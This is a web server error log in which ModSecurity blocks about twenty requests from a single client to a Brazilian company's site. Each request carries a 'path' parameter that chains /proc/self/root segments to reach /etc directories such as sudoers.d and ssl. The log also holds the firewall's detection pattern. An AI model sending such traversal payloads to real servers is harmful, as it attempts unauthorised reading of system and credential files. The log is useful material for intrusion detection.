[Fri Mar 20 07:55:49.151183 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.243.128:36944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ntfHIg5MgXLBnicP3RgAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:50.490239 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:53922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ntjJ3M9BSuKP7CAYbBAAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:51.799634 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.243.128:53936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nt_qxLDW4GITHUkTmiQAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:53.099594 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:53948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nubninkcc-iUj5ApebQAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:54.390023 2026] [:error] [pid 7893:tid 140411733534464] [client 74.7.243.128:53964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nuhCii7xarUs8iHZnmQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:56.681319 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:53968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nvPXLqtnMIWvjpaKarQAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:55:58.181519 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.243.128:53976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nvrninkcc-iUj5ApebwAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:02.507081 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.243.128:38266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nwhCii7xarUs8iHZnnwAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:03.838926 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:38272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nw_qxLDW4GITHUkTmkAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:05.243196 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:38288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nxfqxLDW4GITHUkTmkQAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:06.560042 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:38300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nxjJ3M9BSuKP7CAYbFwAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:07.887305 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:38314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nx-oXxyEfFpUF8f-AxAAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:09.299201 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:38324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nyeoXxyEfFpUF8f-AxQAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:10.608881 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:35192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0nyvXLqtnMIWvjpaKatAAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:22.460936 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.243.128:35200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0n1hCii7xarUs8iHZnsgAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:24.662136 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:60276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0n1wF0L0L-SsrnPo5oggAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:26.123722 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:60278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0n2vqxLDW4GITHUkTmmQAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:29.708053 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.243.128:60282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0n3bninkcc-iUj5ApegQAAA4g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:36.362905 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.243.128:59156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0n5AF0L0L-SsrnPo5ojQAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 07:56:55.765243 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:59166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0n9zJ3M9BSuKP7CAYbRQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:56:58.368882 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:53274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0n-ta6ubjKNq_cu4bUewAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
